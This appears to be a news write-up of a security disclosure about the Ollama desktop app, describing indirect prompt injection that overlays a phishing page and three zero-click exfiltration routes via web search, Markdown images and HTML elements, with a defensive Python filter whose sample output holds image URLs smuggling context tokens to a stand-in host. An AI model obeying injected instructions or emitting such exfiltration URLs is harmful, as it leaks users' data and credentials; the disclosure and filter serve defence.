Critical Unpatched Vulnerabilities in Ollama Desktop App Enable Phishing and Data Exfiltration
Key Takeaways
- Ollama's desktop app is vulnerable to phishing overlay attacks via indirect prompt injection that can completely overwrite the UI with attacker-controlled content and capture user credentials
- Three zero-click data exfiltration vectors were identified, enabling attackers to steal sensitive user data through malicious prompt injection embedded in external websites or documents
- Vulnerabilities remain unpatched six months after initial disclosure despite four follow-ups, prompting public disclosure by security researchers due to lack of vendor responsiveness
Summary
Security researchers at PromptArmor have disclosed critical vulnerabilities in Ollama's desktop application that enable both phishing overlay attacks and data exfiltration through indirect prompt injection. The vulnerabilities allow attackers to completely overwrite the Ollama user interface with a malicious website via hidden prompt injection on external sites, potentially capturing user credentials. Ollama, a popular open-source tool for running AI models locally with over 170,000 GitHub stars, has remained exposed to these zero-click attack vectors since researchers reported them to the development team in December 2025.
The research details three distinct data exfiltration attack vectors exploitable through indirect prompt injection: attacks via insecure web search tooling, Markdown image rendering, and external HTML element rendering. Each attack chain allows malicious content to manipulate the AI model into exfiltrating sensitive user data without any human-in-the-loop approval steps required. The attacks persist even after users quit and reopen the application, making them particularly dangerous for users working with sensitive documents or confidential models.
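The Markdown image and HTML element vectors named above work because a chat client that renders model output fetches any remote image URL the model emits, so injected instructions can smuggle context data out in that URL. The following is an added defensive example, not code from PromptArmor or the Ollama project: a pre-render filter that strips inline Markdown images and `<img>` tags unless they point at an allowlisted HTTPS host without a query string. The allowlisted host and the sample model output are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample of model output (not taken from the report): one
# legitimate image plus two remote images whose URLs carry context data.
SAMPLE_OUTPUT = """Here is your summary.
![chart](https://docs.example.internal/chart.png)
![tracking](https://example.invalid/c?d=SECRET_TOKEN_FROM_CONTEXT)
<img src="https://example.invalid/pixel.gif?d=MORE_DATA">
"""

# Inline Markdown image: ![alt](url "optional title"). Reference-style
# images (![alt][ref]) are not handled by this filter.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)[^)]*\)')
# Any raw HTML <img ...> element emitted by the model.
HTML_IMG = re.compile(r'<img\b[^>]*>', re.IGNORECASE)


def _allowed(url: str, allowed_hosts: frozenset) -> bool:
    """Default-deny: only HTTPS URLs on allowlisted hosts with no query."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname in allowed_hosts and not p.query


def sanitize_model_output(text: str, allowed_hosts: frozenset = frozenset()):
    """Return (sanitized_text, removed_items) for rendering in a chat UI.

    Markdown images to non-allowlisted URLs and all raw <img> tags are
    replaced with inert placeholders, so the renderer never issues the
    outbound request that would carry exfiltrated data.
    """
    removed = []

    def md_sub(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if _allowed(url, allowed_hosts):
            return m.group(0)
        removed.append(url)
        return f"[image removed: {alt or 'untitled'}]"

    def html_sub(m: re.Match) -> str:
        removed.append(m.group(0))
        return "[html image removed]"

    text = MD_IMAGE.sub(md_sub, text)
    text = HTML_IMG.sub(html_sub, text)
    return text, removed
```

Logging the `removed` list gives a detection signal: a model that suddenly emits remote image URLs carrying long query strings is a strong indicator that an injected instruction reached it.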
Despite following responsible disclosure protocol, the Ollama development team has not responded to the initial report or four subsequent follow-ups since December 18, 2025. Frustrated by the lack of engagement, PromptArmor published the vulnerability details publicly in May 2026 to ensure users are aware of the security risks. This disclosure highlights the growing challenge of responsible vulnerability reporting in the open-source AI ecosystem and raises critical questions about security maturity in widely-deployed AI tools.
Editorial Opinion
This disclosure represents a critical failure in both application security design and responsible vulnerability management. The complete lack of response from the Ollama team over six months and multiple follow-ups is deeply concerning for a tool trusted by thousands of developers worldwide. That a popular open-source AI application can be vulnerable to such fundamental attack vectors—and that maintainers can ignore security reports entirely—signals the AI ecosystem urgently needs better security governance, coordination mechanisms, and accountability. Users should treat this as a wake-up call about thoroughly vetting the security posture of AI tools before deploying them in production environments.